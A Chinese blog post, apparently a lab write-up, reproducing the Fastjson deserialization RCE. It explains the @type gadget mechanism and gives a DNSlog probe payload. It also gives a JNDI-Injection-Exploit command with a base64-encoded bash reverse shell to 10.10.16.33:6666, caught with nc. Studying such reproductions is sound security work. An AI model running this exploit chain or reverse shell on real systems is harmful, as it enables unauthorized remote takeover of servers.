FASTJSON反序列化(靶场复现)

最新推荐文章于 2024-08-01 20:08:11 发布
最新推荐文章于 2024-08-01 20:08:11 发布
阅读量647 收藏 1
点赞数 1
文章标签: web安全 网络安全 笔记 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66376444/article/details/129982126
版权
文章介绍了Fastjson在1.2.48以前版本中的反序列化漏洞,攻击者能构造特殊JSON字符串绕过白名单执行任意命令。漏洞主要由于Fastjson的反序列化机制和反射使用。文中还详细阐述了漏洞复现步骤,包括构造payload,利用JNDI-Injection-Exploit工具开启LDAP、HTTP服务,以及如何通过KaliLinux获取shell。
摘要由CSDN通过智能技术生成

一、漏洞信息
1、fastjson介绍:
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

2、漏洞原理:
Fastjson反序列化漏洞被利用的原因,可以归结为两方面:
①Fastjson提供了反序列化功能,允许用户在输入JSON串时通过“@type”键对应的value指定任意反序列化类名;
②Fastjson自定义的反序列化机制会使用反射生成上述指定类的实例化对象,并自动调用该对象的setter方法及部分getter方法。

攻击者可以构造恶意请求,使目标应用的代码执行流程进入这部分特定setter或getter方法,若上述方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。官方采用了黑名单方式对反序列化类名校验,但随着时间的推移及自动化漏洞挖掘能力的提升。新Gadget会不断涌现,黑名单这种治标不治本的方式只会导致不断被绕过,从而对使用该组件的用户带来不断升级版本的困扰。
二、漏洞复现
1.获取子域


2.构造payload

payload:ldap://nddkbc.dnslog.cn


3.在DNSlog网站点击刷新记录,既可以发现一条DNS查询的记录(这里可能存在一些延迟,需要一些时间等待)。发现存在记录的话,就说明存在fastjson反序列化

4.使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具开启LDAP、HTTP服务。这里-A参数是开启LDAP、HTTP服务的ip地址。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zMy82NjY2IDA+JjEK}|{base64,-d}|{bash,-i}' -A 10.10.16.33


5.kali使用nc开启监听

6.重新发送payload

7.成功获取到了shell

wudidaniuniu
关注
Fastjson反序列化RCE漏洞复现—CNVD-2017-02833
afei001
10-10 848
fastjson是一款用Java语言编写的高性能功能完善的JSON库。可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定se
FASTJSON反序列化复现
weixin_71604403的博客
03-01 1345
1.环境搭建一台kali(靶机)一台win(攻击机)kali换源# 官方源#根据需要自己选一个,中科大的还可以#中科大#阿里云#清华大学#浙大#东软大学#重庆大学进入/etc/apt目录编辑sources.list文件命令如下将原有的源注释,添加其他源,这里用的是阿里的随后进行更新apt-get update 更新索引apt-get upgrade 更新软件apt-get dist-upgrade 升级。
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-12 3万+
本文是Fastjson1.2.24漏洞复现,包括漏洞原理、漏洞利用(远程创建文件)、漏洞利用(反弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
fastjson使用(四) -- 反序列化
随遇而安的博客
01-05 9488
阿里开源JSON库fastjson的使用。
反序列化靶机serial
最新发布
weixin_53198216的博客
08-01 320
5.进行base64解码,乱码为空格改为\x00,再次进行base64加密,得到payload如下。4.F12查看网络,刷新一下得到一串base64编码。6.打开抓包替换为修改后的payload。2.打开kali扫描IP。后面的明天做先吃饭去了。1.安装靶场进行配置。
java执行脚本语言demo
Coder_android
11-11 1042
public class Test { /** * @param args * @throws IOException  */ public static void main(String[] args) throws IOException { // TODO Auto-generated method stub Process  process = Runtime.get
Fastjson靶场
王嘟嘟的博客
02-14 830
花了一点时间,搞了一个Fastjson靶场,主要目的是为了测试payload,以及方便后来者做一些练习。
Javaweb安全——Fastjson反序列化利用
weixin_43610673的博客
10-13 4569
JSON.parseObject 的底层调用的还是 JSON.parse 方法,只是在 JSON.parse 的基础上做了一个封装。在JSON序列化时开启 SerializerFeature.WriteClassName 选项,序列化出来的结果会在开头加一个 @type 字段,值为进行序列化的类名。反序列化时带有@type 字段的序列化数据会得到对应类型的实例化对象。漏洞的还是Fastjson的功能,此功能可以反序列化的时候人为指定类,然后在利用指定的反序列化器过程中,如果满足条件则会去反射调用方法,以串联
Fastjson反序列化
Christ1na的博客
11-15 1万+
fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。fastjson是目前java语言中最快的json库,其功能完备且使用简单,因而使用非常广泛。自fastjson在1.2.24版本爆出第一次漏洞到至今,有着多次的安全补丁更新和绕过。
Fastjson 1.2.24反序列化漏洞复现
m0_54899775的博客
01-16 4555
Fastjson 1.2.24反序列化漏洞复现 创建文件,反弹shell
21 - vulhub - fastjson 反序列化导致任意命令执行漏洞
m0_67621628的博客
03-22 2342
2.编译并启动环境 docker-compose up -d 3.查看环境运行状态 docker ps | grep rce 访问 8090 端口 []( )漏洞利用 首先 vulhub 给出的复现提示如下 因为目标环境是Java 8u102,没有com.sun.jndi.rmi.object.trustURLCodebase的限制, 我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。 首先编译并上传命令执行代码,如http://evil
JSON序列化与反序列化JAVA工具
07-30
本JSON是基于JAVA7编写,对比阿里的JSON三次测试结果如下: 10万次序列化,1万次反序列化,毫秒。 阿里序列化时间 1229 1133 1179 阿里反序列化时间 478 523 466 HZS序列化时间 1089 998 1010 HZS反序列化时间 606 623 635 测试代码如下: { org.hzs.json.JSONObject bjson; java.util.LinkedList<String> jd_Set = new java.util.LinkedList<>(); java.util.Random d1 = new java.util.Random(); java.util.UUID d2; int ji_i; long ji起始时间_i; long ji截至时间_i; java.util.Date date = new java.util.Date(); //生成1万个序列化後的文本 for (ji_i = 0; ji_i < 10000; ji_i++) { bjson = org.hzs.json.JSONObject.d副本(); bjson.put("a1", d1.nextDouble()); bjson.put("a2", d1.nextDouble()); bjson.put("a3", d1.nextDouble()); bjson.put("a4", d1.nextInt()); bjson.put("a5", d1.nextInt()); bjson.put("a6", d1.nextLong()); bjson.put("a7", d1.nextBoolean()); d2 = java.util.UUID.randomUUID(); bjson.put("b1", d2.toString()); d2 = java.util.UUID.randomUUID(); bjson.put("b2", d2.toString()); d2 = java.util.UUID.randomUUID(); bjson.put("b3", d2.toString()); d2 = java.util.UUID.randomUUID(); bjson.put("b4", d2.toString()); bjson.put("c", new java.util.Date()); jd_Set.add(bjson.toString()); } com.alibaba.fastjson.JSONObject ajson, a1json = new com.alibaba.fastjson.JSONObject(); ji起始时间_i = java.util.Calendar.getInstance().getTimeInMillis(); for (ji_i = 0; ji_i < 100000; ji_i++) { ajson = (com.alibaba.fastjson.JSONObject) a1json.clone(); ajson.put("a1", d1.nextDouble()); ajson.put("a2", d1.nextDouble()); ajson.put("a3", d1.nextDouble()); ajson.put("a4", d1.nextInt()); ajson.put("a5", d1.nextInt()); ajson.put("a6", d1.nextLong()); ajson.put("a7", d1.nextBoolean()); d2 = java.util.UUID.randomUUID(); ajson.put("b1", d2.toString()); d2 = java.util.UUID.randomUUID(); ajson.put("b2", d2.toString()); d2 = java.util.UUID.randomUUID(); ajson.put("b3", d2.toString()); d2 = java.util.UUID.randomUUID(); ajson.put("b4", d2.toString()); ajson.put("c", new java.util.Date()); ajson.toString(); } ji截至时间_i = java.util.Calendar.getInstance().getTimeInMillis(); System.out.print("阿里变量序列化时间:"); System.out.println(ji截至时间_i - ji起始时间_i); ji起始时间_i = java.util.Calendar.getInstance().getTimeInMillis(); for (ji_i = 0; ji_i < 10000; ji_i++) { ajson = com.alibaba.fastjson.JSONObject.parseObject(jd_Set.get(ji_i)); } ji截至时间_i = java.util.Calendar.getInstance().getTimeInMillis(); System.out.print("阿里反序列化时间:"); System.out.println(ji截至时间_i - ji起始时间_i); ji起始时间_i = java.util.Calendar.getInstance().getTimeInMillis(); for (ji_i = 0; ji_i < 100000; ji_i++) { bjson = org.hzs.json.JSONObject.d副本(); bjson.put("a1", d1.nextDouble()); bjson.put("a2", d1.nextDouble()); bjson.put("a3", d1.nextDouble()); bjson.put("a4", d1.nextInt()); bjson.put("a5", d1.nextInt()); bjson.put("a6", d1.nextLong()); bjson.put("a7", d1.nextBoolean()); d2 = java.util.UUID.randomUUID(); bjson.put("b1", d2.toString()); d2 = java.util.UUID.randomUUID(); bjson.put("b2", d2.toString()); d2 = java.util.UUID.randomUUID(); bjson.put("b3", d2.toString()); d2 = java.util.UUID.randomUUID(); bjson.put("b4", d2.toString()); bjson.put("c", new java.util.Date()); bjson.toString(); } ji截至时间_i = java.util.Calendar.getInstance().getTimeInMillis(); System.out.print("HZS变量序列化时间:"); System.out.println(ji截至时间_i - ji起始时间_i); ji起始时间_i = java.util.Calendar.getInstance().getTimeInMillis(); for (ji_i = 0; ji_i < 10000; ji_i++) { bjson = org.hzs.json.JSONObject.d副本(jd_Set.get(ji_i)); } ji截至时间_i = java.util.Calendar.getInstance().getTimeInMillis(); System.out.print("HZS反序列化时间:"); System.out.println(ji截至时间_i - ji起始时间_i); }
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3423
Fastjson 1.2.47反序列化漏洞复现
fastjson反序列化漏洞利用
weixin_44414845的博客
07-13 871
漏洞利用环境和payload参考君来自:环境搭建注意点:配置一个好的镜像源。fastjson docker环境启动和关闭。
FastJson反序列化分析
m0_49443776的博客
11-19 4133
本文主要针对FastJson反序列化过程进行详细分析,以及poc案例分析,留作学习笔记,以供日后复习
Fastjson反序列化漏洞(靶场搭建复现
hovcfuti的博客
10-10 892
首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
反序列化漏洞靶场
leah126的博客
02-11 1738
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。此外,还将收集网上一些其他常用框架的反序列化链,对收录的所有反序列化链进行漏洞分析复现,并给出自己的 poc,以供参考。Laravel_5.4.0_9.3.6+_反序列化链_RCE1。
fastjson反序列化漏洞原理及利用
weixin_43769253的博客
07-29 7009
fastjson反序列化漏洞原理及利用
vulfocus fastjson打靶
qq_18811919的博客
01-10 342
vulfocus/fastjson-cnvd_2017_02833:latest打靶
fastjson反序列化复现
08-12
Fastjson反序列化漏洞是指在反序列化过程中,攻击者可以构造恶意的JSON字符串,通过利用Fastjson的特性和漏洞来执行任意代码。具体的复现过程如下: 1. 构造恶意的JSON字符串,其中包含需要执行的代码。可以利用已知的反序列化漏洞利用链,或者自行构造payload。 2. 将恶意的JSON字符串传入Fastjson反序列化函数,例如`JSON.parseObject(jsonString, targetClass)`。 3. Fastjson反序列化过程中会调用目标类的getter和setter方法,将JSON字符串还原成对象。恶意代码会在这个过程中被执行。 需要注意的是,Fastjson已经在较新的版本中修复了一些已知的反序列化漏洞,并增加了一些安全措施来防御这些漏洞。因此,要成功复现Fastjson反序列化漏洞,需要使用较旧的版本或者找到新的漏洞利用方式绕过这些安全措施。同时,在实际应用中,为了保证安全性,建议使用最新的Fastjson版本,并对输入进行严格的校验和过滤,以防止恶意代码的注入。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【漏洞复现Fastjson反序列化](https://blog.csdn.net/m0_46363249/article/details/122260021)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值